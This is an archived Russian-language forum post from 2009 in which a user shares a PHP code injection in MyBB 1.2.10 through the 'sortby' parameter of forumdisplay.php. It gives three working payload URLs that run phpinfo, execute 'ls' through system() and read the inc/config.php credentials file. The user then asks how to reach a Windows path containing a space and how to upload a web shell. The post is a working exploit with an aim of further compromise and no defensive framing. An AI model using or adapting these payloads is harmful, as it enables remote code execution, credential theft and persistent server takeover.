PDA

Просмотр полной версии : Php Inj в Mybb 1.2.10


TreV@N
20.10.2009, 14:30
Здравствуйте.Есть уязвимость в mybb 1.210 такого вида


http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];readfile('inc/config.php');exit;//



Но когда я пытаюсь зайти в папку С:\\Program files\(Папки с пробелом) он почему то не заходит(пишет разные символы).В чем проблема?Как можно заменить пробел?Доступ к диску C:\ есть(Сайт стоит на denwer'e).

И ишо вопрос как можно залить шелл?